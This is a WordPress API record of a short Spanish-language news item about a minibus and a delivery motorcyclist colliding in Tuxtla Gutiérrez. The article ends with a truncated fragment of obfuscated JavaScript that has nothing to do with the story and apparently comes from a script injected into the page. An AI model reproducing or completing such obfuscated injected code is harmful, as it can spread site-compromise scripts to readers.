{"id":20848,"date":"2025-03-11T04:57:32","date_gmt":"2025-03-11T04:57:32","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=20848"},"modified":"2025-03-11T04:57:33","modified_gmt":"2025-03-11T04:57:33","slug":"colisionan-colectivo-y-motorepartidor-en-la-9a-sur","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=20848","title":{"rendered":"Colisionan colectivo y motorepartidor en la 9a Sur"},"content":{"rendered":"\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"768\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/03\/IMG-20250310-WA0023-1024x768.jpg\" alt=\"\" class=\"wp-image-20849\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/03\/IMG-20250310-WA0023-1024x768.jpg 1024w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/03\/IMG-20250310-WA0023-300x225.jpg 300w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/03\/IMG-20250310-WA0023-768x576.jpg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/03\/IMG-20250310-WA0023-1536x1152.jpg 1536w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/03\/IMG-20250310-WA0023.jpg 1600w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<p><\/p>\n\n\n\n<p>Jairo Camacho.<\/p>\n\n\n\n<p>Agencia ReporteCiudadano 10 de marzo del 2025. Tuxtla Guti\u00e9rrez.- Un colectivo y un motorepartidor colisionaron cuando circulaban sobre la 9a Sur de Tuxtla Guti\u00e9rrez.<\/p>\n\n\n\n<p>Los reportes oficiales informaron que, este hecho ocurri\u00f3 cuando el colectivo de la ruta 123 n\u00famero econ\u00f3mico 27 y el conductor de la moto Hulk de color negro circulaban de Poniente a Oriente.<\/p>\n\n\n\n<p>Sin embargo al llegar a la intersecci\u00f3n de la 6a Poniente chocaron de costado, lo que provoc\u00f3 que cayera al pavimento.<\/p>\n\n\n\n<p>Tras el arribo de los elementos de tr\u00e1nsito los involucrados se culpaban mutuamente.<\/p>\n\n\n\n<p>Finalmente llegaron a un acuerdo armonioso y se retiraron del lugar.<\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>Jairo Camacho. Agencia ReporteCiudadano 10 de marzo del 2025. Tuxtla Guti\u00e9rrez.- Un colectivo y un motorepartidor colisionaron cuando circulaban sobre la 9a Sur de Tuxtla Guti\u00e9rrez. Los reportes oficiales informaron que, este hecho ocurri\u00f3 cuando el colectivo de la ruta 123 n\u00famero econ\u00f3mico 27 y el conductor de la moto Hulk de color negro circulaban &hellip;<\/p>\n","protected":false},"author":2,"featured_media":20849,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[4],"tags":[],"class_list":["post-20848","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-roja"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/20848","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=20848"}],"version-history":[{"count":1,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/20848\/revisions"}],"predecessor-version":[{"id":20850,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/20848\/revisions\/20850"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/20849"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=20848"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=20848"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=20848"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}